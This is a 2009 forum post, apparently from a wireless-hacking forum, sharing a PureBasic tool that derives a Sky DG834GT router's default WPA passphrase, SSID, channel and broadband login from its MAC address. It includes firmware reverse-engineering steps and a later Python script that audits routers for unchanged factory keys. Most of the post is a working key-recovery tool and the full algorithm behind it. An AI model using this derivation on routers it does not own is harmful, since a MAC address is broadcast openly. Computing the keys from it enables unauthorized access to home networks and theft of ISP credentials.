From the remote-exploit wireless forum (the BackTrack people):
http://forums.remote-exploit.org/wireless/19462-default-wpa-keys-3.html#post132057
It looks like someone has dug into the Netgear and extracted the algorithm used to generate the default WPA key.
The code for the SKY DG834GT decoder v1.0 is available in the same post.
Regards,
ChimoC
P.S.: Thanks to user Mambostar from the seguridadwireless site for passing us the information

Code:
; SKY DG834GT decoder v1.0
; 6th May 2009
;
; Ref: (no url yet)
; Please note that the following is sloppy coding, my brain is fried. I didn't actually
; achieve any result by viewing the MIPS assembler functions of the router binaries, but this is
; where I started: I have Ubuntu installed and the QEMU emulator, running MIPS (Debian)
; Snip (no url yet)
; (The Debian Etch MIPS small) - rest of the instructions are on that page.
;
; Once up And running I install GDB And place the SKY router binary 'RC' (usr/sbin/rc) on a webserver
; where I can 'wget' it To the emulated MIPS environment. The binaries for the router can be found
; here: (snip)
; The file you're after is: DG834GT-1SKUK (For Firmware Version 1.02.28) - within that archive
; is target.tar.bz2 - unpack that and you'll find the RC binary.
;
; You'll also have to copy some libs over from that target archive to your /lib/ directory...
; ld-uClibc-0.9.28.so
; ld-uClibc.so.0
; libc.so.0
; libuClibc-0.9.28.so
; else the RC binary will appear to not function.
; Make sure to CHMOD 777 the libs and RC binary.
;
; After failing badly to understand any of the code of RC using GDB,
; I found another way. In the QEMU emulator I renamed my MD5SUM to MD5SUM2, then copied
; my 'more' command to 'MD5SUM' (find them using the 'whereis' command). Effectively, this lets
; GDB run the RC file without creating an MD5SUM. You create it yourself. It still calls MD5SUM, but
; doesn't realise it's calling 'more' instead. So what it's doing is echoing your personalised MAC
; file to itself and creating the password/phrase/etc into the newly created nvram file. With this
; method you can trial and error to find algorithm combinations.
;
; GDB: shell echo -n 00000000000000000000000000000000 >mac
; GDB: file rc
; GDB: start
; GDB: jump EzPassword
; GDB: shell more nvram
;
; To get this to work correctly you have to type 'start' in GDB before every attempt. Values for
; nvram include: EzPassword, EzSSID, EzChannel, EzPassphrase (all of which can be jumped to, see above)
;
; Purebasic source requires Droopy Library for hex2dec function
; Window functions derived from public domain source by 'Kale'.
; DG934G v2 SKY router uses the serial on the router itself,
; which is added To the tmp/mac file As: 1a1b1c2a2d2f-12345678...
; (I think!) - trying this out on norm360's data brings the correct
; password etc but not the correct Passphrase. Working on it.
; Ref: (snip)
; Haven't looked at the v3 router yet.
; I think this is all right, my brain is mince, as I said.
; The following is to set the window/button setup
; which I can't explain well, since I took and modified the code
; from public domain archives
#Window_0 = 0
#Window_1 = 1
#Gadget_0 = 0
#Gadget_1 = 1
#Gadget_2 = 2
#Gadget_3 = 3
#Gadget_4 = 4
#Gadget_5 = 5
#Gadget_6 = 6
#Gadget_7 = 7
Procedure AddText()
  existingText.s = GetGadgetText(#Gadget_0)
  If existingText = ""
    SetGadgetText(#Gadget_0, GetGadgetText(#Gadget_1))
  Else
    SetGadgetText(#Gadget_0, existingText + Chr(13) + Chr(10) + GetGadgetText(#Gadget_1))
  EndIf
  lines = SendMessage_(GadgetID(0),#EM_GETLINECOUNT,0,0)
  SendMessage_(GadgetID(#Gadget_0), #EM_LINESCROLL, 0, lines)
EndProcedure
If OpenWindow(#Window_0, 5, 5, 690, 300, "Sky v1.0 - DG834GT", #PB_Window_MinimizeGadget | #PB_Window_MaximizeGadget | #PB_Window_SystemMenu | #PB_Window_ScreenCentered )
  If CreateGadgetList(WindowID(#Window_0))
    EditorGadget(#Gadget_0, 5, 5, 680, 254, #ES_MULTILINE | #ES_AUTOVSCROLL | #ES_AUTOHSCROLL | #WS_VSCROLL )
    StringGadget(#Gadget_1, 5, 270, 250, 21, "")
    ButtonGadget(#Gadget_2, 270, 270, 65, 22, "Go")
    ButtonGadget(#Gadget_3, 340, 270, 65, 22, "Info")
    ButtonGadget(#Gadget_4, 410, 270, 65, 22, "Null1")
    ButtonGadget(#Gadget_5, 480, 270, 65, 22, "Null2")
    ButtonGadget(#Gadget_6, 550, 270, 65, 22, "Null3")
    ButtonGadget(#Gadget_7, 620, 270, 65, 22, "Null4")
  EndIf
EndIf
Repeat
  Event = WaitWindowEvent()
  Select Event
    Case #PB_Event_Gadget
      Select EventGadget()
        ; Button Go is pressed
        Case #Gadget_2
          If GetGadgetText(#Gadget_1) <> ""
            mac$=GetGadgetText(#Gadget_1)
            Gosub pro
          EndIf
          SetGadgetText(#Gadget_0,"")
          SetGadgetText(#Gadget_0,all$)
          SetGadgetText(#Gadget_1,"")
        ; Button Read Me is pressed
        Case #Gadget_3
          mystring.s = PeekS(?source)
          SetGadgetText(0, mystring.s)
      EndSelect
  EndSelect
Until Event = #PB_Event_CloseWindow
End
pro:; Main routine to grab everything from the hash
; Uppercases your mac and removes the : colons if entered
; No other checks on the mac are done in this version
mac$=UCase(RemoveString(mac$,":"))
; Purebasic inbuilt md5sum routine
; If doing an MD5SUM in Linux, create your /tmp/mac file with
; echo -n 1a2b3c4d5e6f >mac - Make sure to use the n flag
hash$=MD5Fingerprint(@mac$, Len(mac$))
; This takes 5 double-char hex characters from the MAC
; starting with position 1 - example (MD5SUM for 112233445566):
; eb341820cd3a3485461a61b1e97d31b1 - split this to
; eb 34 18 20 cd
; Then split from position 15, 10 characters again:
; 85 46 1a 61 b1
; I then converted the first five to decimal, then
; the second five and added eb + 85, 34 + 46, etc
; Converted them back to hex and then converting again to 2-digit hex
; (first sum of eb + 85 = 170, so becomes 70)
; Place all of your 5 sums together in one line to
; create the password:
; 70 7a 32 81 7e -> 707a32817e
; I did try adding eb341820cd + 85461a61b1 but the result
; was wrong, maybe it was my math, or the routine, or maybe
; it just can't be done that way, I don't know.
a1=Hex2Dec(Mid(hash$,1,2))
a2=Hex2Dec(Mid(hash$,3,2))
a3=Hex2Dec(Mid(hash$,5,2))
a4=Hex2Dec(Mid(hash$,7,2))
a5=Hex2Dec(Mid(hash$,9,2))
b1=Hex2Dec(Mid(hash$,15,2))
b2=Hex2Dec(Mid(hash$,17,2))
b3=Hex2Dec(Mid(hash$,19,2))
b4=Hex2Dec(Mid(hash$,21,2))
b5=Hex2Dec(Mid(hash$,23,2))
sum1$=Right(Hex(a1+b1),2)
sum2$=Right(Hex(a2+b2),2)
sum3$=Right(Hex(a3+b3),2)
sum4$=Right(Hex(a4+b4),2)
sum5$=Right(Hex(a5+b5),2)
password$=LCase(sum1$+sum2$+sum3$+sum4$+sum5$)
; The following creates an array for easy lookup of the Passphrase.
; 00 = A, 01 = B, 02 = C, etc until Z is reached,
; then we kick back to A: 19 = Z, 1a = A, 1b = B
; The 8 hex values for the Passphrase can be found in the hash
; at these locations:
; Position 3,7,11,15,19,23,27,31 - an example using 1's and 0's,
; where the 1's are the Passphrase hex values:
; 00110011001100110011001100110011
; So if the above MD5SUM = 00990011001100110011001100110011
; Then via the array-lookup, the Passphrase is:XRRRRRRR
; X=99, R=11
Dim phrasearray.s(255)
a=65
For i = 0 To 255
  letter$=Chr(a)
  find$=LCase(RSet(Hex(i),2,"0"))+" "+letter$
  phrasearray(i)=find$
  a=a+1
  If a=91 : a=65 : EndIf
Next
p1=Hex2Dec(Mid(hash$,3,2))
phrase$+Mid(phrasearray(p1),4,1)
p2=Hex2Dec(Mid(hash$,7,2))
phrase$+Mid(phrasearray(p2),4,1)
p3=Hex2Dec(Mid(hash$,11,2))
phrase$+Mid(phrasearray(p3),4,1)
p4=Hex2Dec(Mid(hash$,15,2))
phrase$+Mid(phrasearray(p4),4,1)
p5=Hex2Dec(Mid(hash$,19,2))
phrase$+Mid(phrasearray(p5),4,1)
p6=Hex2Dec(Mid(hash$,23,2))
phrase$+Mid(phrasearray(p6),4,1)
p7=Hex2Dec(Mid(hash$,27,2))
phrase$+Mid(phrasearray(p7),4,1)
p8=Hex2Dec(Mid(hash$,31,2))
phrase$+Mid(phrasearray(p8),4,1)
; The SSID array is created as above, where
; a hex value of 00=0 and 09=9. When it reaches 9
; the array kicks back To 0, so 0a = 0
; The hex positions in the MD5SUM are found
; at 23,25,27,29,31
; Example: 0102031a1b = 12367
Dim ssidarray.s(255)
a=48
For i = 0 To 255
  digit$=Chr(a)
  find$=LCase(RSet(Hex(i),2,"0"))+" "+digit$
  ssidarray(i)=find$
  a=a+1
  If a=58 : a=48 : EndIf
Next
s1=Hex2Dec(Mid(hash$,23,2))
ssid$+Mid(ssidarray(s1),4,1)
s2=Hex2Dec(Mid(hash$,25,2))
ssid$+Mid(ssidarray(s2),4,1)
s3=Hex2Dec(Mid(hash$,27,2))
ssid$+Mid(ssidarray(s3),4,1)
s4=Hex2Dec(Mid(hash$,29,2))
ssid$+Mid(ssidarray(s4),4,1)
s5=Hex2Dec(Mid(hash$,31,2))
ssid$+Mid(ssidarray(s5),4,1)
; Channel array same as above, but it appears
; they only use channels 1,6 and 11 - so the array
; creates 00=1, 01=6, 02=11, 03 =1, 04=6, etc.
; Channel hex in the MD5SUM is found at position 31 (last two
; characters of the MD5SUM)
Dim channelarray.s(255)
a=1
For i = 0 To 255
  find$=LCase(RSet(Hex(i),2,"0"))+" "+Str(a)
  channelarray(i)=find$
  a=a+5
  If a>12 : a=1 : EndIf
Next
s1=Hex2Dec(Mid(hash$,31,2))
; Read up to two characters so that channel 11 is not cut down to 1
channel$+Mid(channelarray(s1),4,2)
;Dump them all into variables
x$=Chr(13)+Chr(10)
a$="MD5SUM: "+hash$
b$="Username: "+mac$+"@skydsl"
c$="Password: "+password$
d$="Passphrase: "+phrase$
e$="SSID: SKY"+ssid$
f$="Channel: "+channel$
; Dump all of the above into a shorter single line with breaks
all$= a$+x$+b$+x$+c$+x$+d$+x$+e$+x$+f$
; Reset some stuff
hash$=""
mac$=""
password$=""
phrase$=""
channel$=""
ssid$=""
find$=""
Return
; Includes this source file into the Purebasic executable
DataSection
source : IncludeBinary "source.txt" + Chr(0)
phrasearray : IncludeBinary "phrasearray.txt" + Chr(0)
ssidarray : IncludeBinary "ssidarray.txt" + Chr(0)
channelarray : IncludeBinary "channelarray.txt" + Chr(0)
EndDataSection
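For anyone auditing their own routers of this model, the check below flags devices whose configured WPA passphrase is still the factory value produced by the MD5 lookup described in the comments above. It is an added example, not part of the original post or of the decoder; the function names and the inventory layout are hypothetical, only the passphrase and SSID tables are covered, and the MAC is uppercased before hashing as the decoder does.

```python
import hashlib

# 0-based byte indexes into the 16-byte MD5 digest, converted from the
# 1-based hex positions given in the PureBasic source.
PHRASE_BYTES = (1, 3, 5, 7, 9, 11, 13, 15)  # hex positions 3,7,11,...,31
SSID_BYTES = (11, 12, 13, 14, 15)           # hex positions 23,25,27,29,31


def normalise_mac(mac):
    """Strip separators and uppercase, as the decoder does before hashing."""
    mac = mac.replace(":", "").replace("-", "").upper()
    if len(mac) != 12 or any(c not in "0123456789ABCDEF" for c in mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return mac


def defaults_from_digest(digest):
    """Apply the post's lookup tables: byte mod 26 -> A-Z, byte mod 10 -> 0-9."""
    if len(digest) != 16:
        raise ValueError("expected a 16-byte MD5 digest")
    phrase = "".join(chr(ord("A") + digest[i] % 26) for i in PHRASE_BYTES)
    ssid = "SKY" + "".join(str(digest[i] % 10) for i in SSID_BYTES)
    return {"passphrase": phrase, "ssid": ssid}


def factory_defaults(mac):
    """Factory passphrase and SSID for one MAC (MD5 over the ASCII MAC string)."""
    digest = hashlib.md5(normalise_mac(mac).encode("ascii")).digest()
    return defaults_from_digest(digest)


def audit(inventory):
    """Return rows whose configured WPA passphrase is still the factory value."""
    findings = []
    for row in inventory:
        expected = factory_defaults(row["mac"])
        if row["passphrase"] == expected["passphrase"]:
            findings.append({"mac": normalise_mac(row["mac"]),
                             "ssid_unchanged": row["ssid"] == expected["ssid"]})
    return findings


# Constructed inventory: the first router keeps its factory settings, the
# second has had its passphrase and SSID changed by the owner.
_factory = factory_defaults("00:11:22:33:44:55")
SAMPLE_INVENTORY = [
    {"mac": "00:11:22:33:44:55", **_factory},
    {"mac": "00:11:22:33:44:66", "ssid": "home-net",
     "passphrase": "correct horse battery staple"},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_INVENTORY):
        print("factory passphrase still in use:", finding)
```

Any router the audit reports should have its passphrase replaced with a randomly generated one, since the factory value is a fixed function of an address the device broadcasts.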